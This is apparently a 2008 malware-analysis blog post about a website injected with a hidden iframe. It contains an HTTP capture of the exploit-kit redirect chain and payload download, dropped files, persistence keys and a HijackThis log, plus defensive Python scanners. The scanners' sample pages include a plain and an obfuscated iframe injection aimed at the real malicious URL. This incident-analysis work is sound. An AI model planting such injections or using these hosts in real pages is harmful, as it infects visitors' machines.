Website with hidden iframe and Malware Analysis

It all began this morning (16/10/2008) at 13:00: I checked the HTML code of index.php and saw something suspicious inside. Our index.php and four other .php pages had been infected with an iframe between 11:00 and 13:00. Fortunately we check the code of our site every 2 to 3 hours, so the infected code was removed immediately.

I decided to analyze the iframe code, using an old, unpatched version of Internet Explorer 6.0 to make sure the infection would succeed. I visited the iframe URL and after a few seconds a massive malware infection started: my computer began connecting to a lot of different IPs.

Here is the result of the sniffed network traffic:

GET /in.cgi?id111 HTTP/1.1
Host: fstat.cn
Connection: Keep-Alive
 
HTTP/1.1 302 Found
Location: hxxp://mmcounter.com/tds/in.cgi?default
 
GET /tds/in.cgi?default HTTP/1.1
Accept-Language: en-us
Host: mmcounter.com
Connection: Keep-Alive
 
HTTP/1.1 302 Found
Location: hxxp://lite.ff-freehosting.com/all/index.php
 
GET /all/index.php HTTP/1.1
Host: lite.ff-freehosting.com
 
HTTP/1.1 200 OK
Content-Length: 7880
 
GET /all/controller.php?action=bot&entity_list=0 HTTP/1.1
Host: 66.232.116.2
 
HTTP/1.1 200 OK
Content-Length: 397312
Entity-Info: 6:71168:2;10:41984:1;38:42496:2;44:57344:2;46:184320:2;
Rnd: 983332
Magic-Number: 32|0|85:214:242:0:116:131:195:213:214:77:222:73
 
GET /all/load.php?id=45751&spl=5 HTTP/1.1
Host: lite.ff-freehosting.com
Connection: Keep-Alive
 
HTTP/1.1 200 OK
Content-Disposition: inline; filename=load.exe
Content-Length: 17475
 
GET /all/controller.php?action=bot&entity_list=&uid=2&first=1&guid=0&rnd=982735 HTTP/1.1
Host: 66.232.116.2
 
HTTP/1.1 200 OK
Content-Length: 397312
Entity-Info: 6:71168:2;10:41984:1;38:42496:2;44:57344:2;46:184320:2;
Rnd: 983188
Magic-Number: 32|0|185:234:45:115:54:0:22:233:187:219:150
Connection: close

While the traffic sniffer was active, the computer was infected by malware that was downloaded into the Temp folder as winMN448Eewaoz.exe. Once executed, it dropped a file named ~.exe into C:\WINDOWS\system32\. The payload was fetched with this GET request (the server labelled the response load.exe in its Content-Disposition header):

GET /all/load.php?id=45751&spl=5 HTTP/1.1

The script load.php takes a parameter named spl set to 5; we can assume it serves the payload for exploit ("sploit") number 5, that is, the exploit that worked against this unpatched IE6. So this is most likely an exploit kit with at least five different exploits, of which number 5 was the one used against this browser.
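As an added example (not code from the original post), here is a small Python script that parses a plain-text capture like the one above and reconstructs the redirect hops and the file downloads, so the kit's structure (two redirector hops, the landing page, the controller check-in, the payload via load.php?spl=N) can be read off mechanically instead of by eye. The transcript embedded in the script is a trimmed copy of the capture shown above; the message-pairing and header-parsing logic is my own and assumes that requests and responses alternate and are separated by blank lines, as they are in this capture.

```python
"""Reconstruct redirect hops and file downloads from a text HTTP capture.

Added example, not code from the original post. CAPTURE is a trimmed copy of
the sniffed traffic shown above (hosts, paths and hxxp:// defanging as
captured). Assumption: requests and responses alternate and each message is
separated from the next by a blank line."""
import re
from urllib.parse import parse_qs, urlsplit

CAPTURE = """\
GET /in.cgi?id111 HTTP/1.1
Host: fstat.cn

HTTP/1.1 302 Found
Location: hxxp://mmcounter.com/tds/in.cgi?default

GET /tds/in.cgi?default HTTP/1.1
Host: mmcounter.com

HTTP/1.1 302 Found
Location: hxxp://lite.ff-freehosting.com/all/index.php

GET /all/index.php HTTP/1.1
Host: lite.ff-freehosting.com

HTTP/1.1 200 OK
Content-Length: 7880

GET /all/controller.php?action=bot&entity_list=0 HTTP/1.1
Host: 66.232.116.2

HTTP/1.1 200 OK
Content-Length: 397312

GET /all/load.php?id=45751&spl=5 HTTP/1.1
Host: lite.ff-freehosting.com

HTTP/1.1 200 OK
Content-Disposition: inline; filename=load.exe
Content-Length: 17475
"""


def parse_transcript(text):
    """[(kind, start_line, headers)] per message; header names lower-cased.
    Only the first ':' splits name from value, so a header such as
    'Entity-Info: 6:71168:2;...' would survive intact."""
    messages = []
    for block in re.split(r"\n\s*\n", text.strip()):
        lines = [ln.rstrip() for ln in block.splitlines() if ln.strip()]
        headers = {}
        for line in lines[1:]:
            name, _, value = line.partition(":")
            headers[name.strip().lower()] = value.strip()
        kind = "response" if lines[0].startswith("HTTP/") else "request"
        messages.append((kind, lines[0], headers))
    return messages


def pair_exchanges(messages):
    """Pair each request with the response that follows it."""
    exchanges, pending = [], None
    for kind, start, headers in messages:
        if kind == "request":
            pending = (start, headers)
        elif pending is not None:
            exchanges.append(pending + (start, headers))
            pending = None
    return exchanges


def request_url(start_line, headers):
    """'host/path?query' from the request line and the Host header."""
    return headers.get("host", "?") + start_line.split(" ", 2)[1]


def redirect_chain(exchanges):
    """Every 3xx hop as (from_url, to_url), hxxp:// defanging stripped."""
    hops = []
    for req, req_h, status, resp_h in exchanges:
        if status.split(" ", 2)[1].startswith("3") and "location" in resp_h:
            target = re.sub(r"^h[tx]{2}ps?://", "", resp_h["location"], flags=re.I)
            hops.append((request_url(req, req_h), target))
    return hops


def downloads(exchanges):
    """Responses that delivered a file (Content-Disposition present), with the
    query parameters of the request that fetched them, e.g. spl=5."""
    found = []
    for req, req_h, _status, resp_h in exchanges:
        disposition = resp_h.get("content-disposition")
        if not disposition:
            continue
        name = re.search(r'filename="?([^";]+)"?', disposition)
        query = parse_qs(urlsplit(req.split(" ", 2)[1]).query)
        found.append({
            "url": request_url(req, req_h),
            "filename": name.group(1) if name else None,
            "length": int(resp_h.get("content-length", "0")),
            "params": {k: v[0] for k, v in query.items()},
        })
    return found


if __name__ == "__main__":
    exchanges = pair_exchanges(parse_transcript(CAPTURE))
    for src, dst in redirect_chain(exchanges):
        print("redirect:", src, "->", dst)
    for item in downloads(exchanges):
        print("download:", item)
```

Run as-is it prints the two redirect hops and the single download; the `params` field of the download is where `spl=5` and `id=45751` surface. The parsed URLs are kept without the hxxp:// defanging so they can be grepped against proxy or web server logs, and nothing is resolved or fetched.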

 

Here is a short summary of the malware's activity:

  • Downloaded into the Temp folder as winMN448Eewaoz.exe
  • Copied to C:\WINDOWS\system32\~.exe
  • Injected code into svchost.exe
  • Opened remote connections to IP 66.232.116.2 on port 80

After some time other files were downloaded onto my system. I started Rootkit Unhooker and noticed some suspicious drivers in the Driver List that made me think of possible stealth malware or rootkit activity.

If you open the properties of rnvrnrrv.sys from the driver column, the file is reported as 0 bytes, with no creation or modification information at all. Why 0 bytes? Because the kernel driver rnvrnrrv.sys is loaded but hidden from Explorer searches (the driver appears to hide every file whose name contains rnvrnrrv), so the shell never gets to read the real file.

Below is the PE import table of rnvrnrrv.sys:

+NTOSKRNL.EXE
ExAllocatePoolWithTag
ExFreePoolWithTag
ZwQuerySystemInformation
RtlImageDirectoryEntryToData
memcpy
memset
_except_handler3

Here is a list of all files created by the malware (in no particular order):

C:\WINDOWS\msauc.exe
C:\WINDOWS\system32\*randomnumber*.cpx
C:\WINDOWS\system32\*randomnumber*.dat
C:\WINDOWS\system32\wpv*randomnumber*.cpx
C:\WINDOWS\system32\msansspc.dll
%TempFolder%\winMN448Eewaoz.exe
%ProgramFiles%\xeifh\SetActAdm.dll
%ProgramFiles%\Internet Explorer\msansspc.dll
C:\WINDOWS\system32\drivers\rnvrnrrv.sys
C:\WINDOWS\system32\shell31.dll
C:\WINDOWS\system32\fqqtiaag.tmp
C:\WINDOWS\TDEZAALK.exe
%AllUsers%\Application Data\almrahwt\mbqlmfin.exe

The malware created the following registry keys:

HKLM\Software\Microsoft\Windows\CurrentVersion\Run\lsass driver
HKLM\Software\Microsoft\Windows\CurrentVersion\Run\TDEZAALK
HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\[51m3u05p5i]

This is a HijackThis log showing the malware traces:

Running processes:
C:\WINDOWS\system32\wpv286.cpx
%AllUsers%\Application Data\almrahwt\mbqlmfin.exe
 
O4 - HKLM\..\Run: [lsass driver] C:\WINDOWS\msauc.exe
O4 - HKLM\..\Run: [TDEZAALK] %systemroot%\TDEZAALK.exe
O4 - HKCU\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\ctfmon.exe
O4 - HKLM\..\Policies\Explorer\Run: [51m3u05p5i] %AllUsers%\Application Data\almrahwt\mbqlmfin.exe
O21 - SSODL: SetActAdm - {002069A6-342F-036E-4AAB-03598A9EEFCE} - C:\Programmi\xeifh\SetActAdm.dll (file missing)
(SwPrvSchedule) - Unknown owner - C:\WINDOWS\system32\wpv5338.cpx.exe (file missing)
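The registry keys listed above and this HijackThis log are the same persistence seen from two sides. As an added example, not part of the original post and not HijackThis logic, the Python below parses the O4, O21 and service lines of this log and attaches to each entry the reasons it deserves a closer look: a missing file, a user-writable data directory, the Policies\Explorer\Run key, a double or odd extension, a system-process name running outside system32, and a random-looking name. The sample log is the one shown above; the scoring rules are my own heuristics, and the vowel/digit "random name" test in particular is an assumption tuned for few false positives rather than for catching everything.

```python
"""Triage autostart entries from a HijackThis-style log.

Added example, not part of the original post or of HijackThis. SAMPLE_LOG is
the log shown above; the scoring rules are my own heuristics and the
vowel/digit 'random name' test is an assumption that trades misses for few
false positives."""
import re

SAMPLE_LOG = r"""
Running processes:
C:\WINDOWS\system32\wpv286.cpx
%AllUsers%\Application Data\almrahwt\mbqlmfin.exe

O4 - HKLM\..\Run: [lsass driver] C:\WINDOWS\msauc.exe
O4 - HKLM\..\Run: [TDEZAALK] %systemroot%\TDEZAALK.exe
O4 - HKCU\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\ctfmon.exe
O4 - HKLM\..\Policies\Explorer\Run: [51m3u05p5i] %AllUsers%\Application Data\almrahwt\mbqlmfin.exe
O21 - SSODL: SetActAdm - {002069A6-342F-036E-4AAB-03598A9EEFCE} - C:\Programmi\xeifh\SetActAdm.dll (file missing)
(SwPrvSchedule) - Unknown owner - C:\WINDOWS\system32\wpv5338.cpx.exe (file missing)
"""

O4_RE = re.compile(r"^O4 - (?P<key>\S+): \[(?P<name>[^\]]+)\] (?P<path>.+)$")
O21_RE = re.compile(r"^O21 - SSODL: (?P<name>\S+) - (?P<clsid>\{[0-9A-Fa-f-]+\}) - (?P<path>.+)$")
SERVICE_RE = re.compile(r"^\((?P<name>[^)]+)\) - Unknown owner - (?P<path>.+)$")
SYSTEM_NAMES = ("lsass", "svchost", "csrss", "winlogon", "smss")


def parse_log(text):
    """One dict per recognised autostart line; everything else is skipped."""
    entries = []
    for line in text.splitlines():
        line = line.strip()
        for kind, rx in (("O4", O4_RE), ("O21", O21_RE), ("service", SERVICE_RE)):
            m = rx.match(line)
            if m:
                entries.append({"kind": kind, "key": "", **m.groupdict()})
                break
    return entries


def looks_random(token):
    """Heuristic (assumption): a long token with almost no vowels, or a
    letter/digit salad, was probably generated rather than chosen."""
    stem = re.sub(r"\.[^.]+$", "", token).lower()
    if len(stem) < 7:
        return False
    if stem.isalpha():
        return sum(c in "aeiouy" for c in stem) / len(stem) < 0.2
    flips = sum(a.isdigit() != b.isdigit() for a, b in zip(stem, stem[1:]))
    return flips >= 3


def reasons(entry):
    """Why this entry deserves a look; [] means 'nothing obvious', not 'clean'."""
    why = []
    low = entry["path"].lower()
    if low.endswith("(file missing)"):
        why.append("file missing (deleted, or hidden by a rootkit)")
        low = low[: -len("(file missing)")].strip()
    base = low.rsplit("\\", 1)[-1]
    if "application data" in low or "\\temp\\" in low or "%temp%" in low:
        why.append("runs from a user-writable data directory")
    if "policies\\explorer\\run" in entry["key"].lower():
        why.append("uses the rarely legitimate Policies\\Explorer\\Run key")
    if base.count(".") > 1:
        why.append("double extension")
    elif not base.endswith((".exe", ".dll")):
        why.append("unusual extension")
    if any(s in entry["name"].lower() for s in SYSTEM_NAMES) and "system32" not in low:
        why.append("name impersonates a system process but runs outside system32")
    if looks_random(entry["name"]) or looks_random(base):
        why.append("random-looking name")
    return why


def triage(text):
    """[(name, path, reasons)] for every autostart entry in the log."""
    return [(e["name"], e["path"], reasons(e)) for e in parse_log(text)]


if __name__ == "__main__":
    for name, path, why in triage(SAMPLE_LOG):
        print("%-14s %s" % (name, path))
        for w in why:
            print("    -", w)
```

Note what it misses: the TDEZAALK entry gets no reasons at all, because its name has enough vowels to pass the heuristic and it sits in %systemroot%, yet it is one of the malware's files. An empty list therefore means "nothing obvious", not "clean"; in practice the remaining entries are compared against a known-good list of the autostarts that machine is expected to have.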

What can we do if our website is infected?

  • Clean the infected HTML/PHP pages (and check every page, not just index.php: here four more .php files carried the same iframe)
  • Change the username and password of the FTP account
  • Change the username and password of the email account
  • Change the username and password of the SSH account
  • Contact the server admin and explain the situation
  • Check your PHP files for possible vulnerabilities
  • Update all installed software (blog, forum, etc.)
  • Never make a backup by copying the (possibly infected) website files from the server to your PC
  • Always keep clean local backups of the website files and restore from those
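The first step above, cleaning the infected pages, is the one people tend to do by eye, and the iframe on this site sat in five files. As an added example, not code from the original post, here is a Python scanner that walks a document root and flags iframes a visitor would never see (0x0 or 1x1, display:none, visibility:hidden, positioned off-screen) as well as scripts that write one through unescape(), String.fromCharCode() or eval(), decoding plain unescape('%..') payloads to rescan them. The three sample pages are constructed for this example (the iframe URL in them is the one from the capture); the detection rules are my own and will not catch every injection technique, so a clean result means "nothing found", not "clean".

```python
"""Scan HTML/PHP pages for hidden iframes, including ones written by
obfuscated JavaScript.

Added example, not code from the original post. The three sample pages are
constructed for this example; the iframe URL in them is the one from the
capture above. The detection rules (0x0/1x1 size, display:none,
visibility:hidden, off-screen position, unescape/fromCharCode/eval in
scripts) are mine and will not catch every injection technique."""
import os
import re
from urllib.parse import unquote

IFRAME_RE = re.compile(r"<iframe\b([^>]*)>", re.I | re.S)
ATTR_RE = re.compile(r"""([a-zA-Z-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+))""")
SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script>", re.I | re.S)
UNESCAPE_RE = re.compile(r"""unescape\(\s*['"]([^'"]+)['"]\s*\)""", re.I)
MARKERS = ("unescape(", "fromcharcode(", "eval(")

CLEAN_PAGE = """<html><body><p>Welcome</p>
<iframe src="/player.html" width="640" height="360"></iframe>
<script>var counter = 1;</script></body></html>"""

INFECTED_PLAIN = """<html><body><p>Welcome</p>
<iframe src="http://fstat.cn/in.cgi?id111" width="0" height="0" frameborder="0"></iframe>
</body></html>"""

INFECTED_OBFUSCATED = """<html><body><p>Welcome</p><script>
document.write(unescape("%3Ciframe%20src%3D%22http%3A%2F%2Ffstat.cn%2Fin.cgi%3Fid111%22%20width%3D%220%22%20height%3D%220%22%20style%3D%22display%3Anone%22%3E%3C%2Fiframe%3E"))
</script></body></html>"""


def _attrs(raw):
    """Attribute dict from the inside of a tag; names lower-cased."""
    return {m.group(1).lower(): m.group(2) or m.group(3) or m.group(4) or ""
            for m in ATTR_RE.finditer(raw)}


def _tiny(value):
    m = re.match(r"\s*(\d+)", value)
    return m is not None and int(m.group(1)) <= 1


def find_hidden_iframes(html):
    """[(src, [reasons])] for every iframe a visitor would not see."""
    hits = []
    for m in IFRAME_RE.finditer(html):
        a = _attrs(m.group(1))
        style = a.get("style", "").replace(" ", "").lower()
        why = []
        if _tiny(a.get("width", "")) or _tiny(a.get("height", "")):
            why.append("zero/one-pixel size")
        if "display:none" in style or "visibility:hidden" in style:
            why.append("hidden by style")
        if re.search(r"(left|top):-\d{3,}", style):
            why.append("positioned off-screen")
        if why:
            hits.append((a.get("src", ""), why))
    return hits


def find_obfuscated_scripts(html):
    """Flag scripts using the usual decoding tricks; where the payload is a
    plain unescape('%..') string, decode it and rescan it for iframes."""
    hits = []
    for m in SCRIPT_RE.finditer(html):
        body = m.group(1)
        markers = [k for k in MARKERS if k in body.lower()]
        decoded = "".join(unquote(p) for p in UNESCAPE_RE.findall(body))
        inner = find_hidden_iframes(decoded)
        if markers or inner:
            hits.append({"markers": markers, "decoded_iframes": inner})
    return hits


def scan_text(html):
    return {"iframes": find_hidden_iframes(html), "scripts": find_obfuscated_scripts(html)}


def scan_directory(root, exts=(".php", ".html", ".htm", ".js")):
    """Walk a site's document root and report every file with findings."""
    report = {}
    for dirpath, _dirs, files in os.walk(root):
        for fn in files:
            if fn.lower().endswith(exts):
                path = os.path.join(dirpath, fn)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    result = scan_text(fh.read())
                if result["iframes"] or result["scripts"]:
                    report[path] = result
    return report


if __name__ == "__main__":
    for label, page in (("clean", CLEAN_PAGE), ("plain", INFECTED_PLAIN),
                        ("obfuscated", INFECTED_OBFUSCATED)):
        print(label, scan_text(page))
```

Point `scan_directory()` at a copy of the document root (downloaded over FTP or, better, a tarball the server admin makes) and diff its report against the last clean backup. The scanner matches on structure rather than on a hostname, so it still fires when the attacker rotates the first hop, as happened between fstat.cn here and the litetopfindworld in.cgi URL mentioned in the comments; a clean pass is only as good as the rules, and a page that builds the iframe from String.fromCharCode() is flagged but not decoded.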

6 Approved Responses so far

  1. LaiD Says:

    Great work man!
    Which version of rku you used to detect the rootkit ?

    LaiD

  2. Robert Says:

    hey LaiD,
    I used version:
    Rootkit Unhooker LE v3.8.340.550

  3. Hitesh Says:

    Hi,
    Impressed with the research done.

    It is very useful information. Would appreciate if somebody can give more info on how to remove the virus from the web server, as Google is reporting the site as a malware-spreading file and blocking it.

    Looking for some simple solution to get rid of the problem.

    Thanks,

  4. Robert Says:

    Hi Hitesh,

    you can send the HijackThis logs (http://download.hijackthis.eu/HJTInstall.exe) to my email (robert@novirusthans.org) so I can analyze them in more depth and suggest how to remove the malware easily : )

    -Robert

  5. Anand Says:

    Hi Robert,

    This is the second time this site has been infected. For the first time, we removed the site from service and uploaded it again. After 2 weeks it was reinfected through an iframe code on the webpages.
    How is the code inserted? What can be done to clean the website? Also, how can we prevent future infections?

    Regards
    Anand

  6. Robert Says:

    Hi Anand, I removed your link because your site is still infected with the hidden iframe, here is the captured malicious code:

    hzzp://litetopfindworld.XX/in.cgi?cocacola46

    You need to remove this malicious code from your homepage; you should also look through all your website files for other possible hidden iframe codes, and I suggest you restore your website files from your old (clean) backup. It is possible that the hacker gained access to your server through a vulnerability in your website, so be sure that you have the latest version of all applications/web apps/CMS installed on your website and that your website does not contain SQL/RFI/LFI bugs.

    If you use a shared server, a hacker only needs to own one of the shared websites to gain access to all the other websites; my other suggestion, if you are on a shared server, is to use a dedicated server.

    Let me know if you have other problems or you need deeper help.

    //Edit:

    You can find the analysis by following this link:
    Analysis of a website infected with a hidden iframe
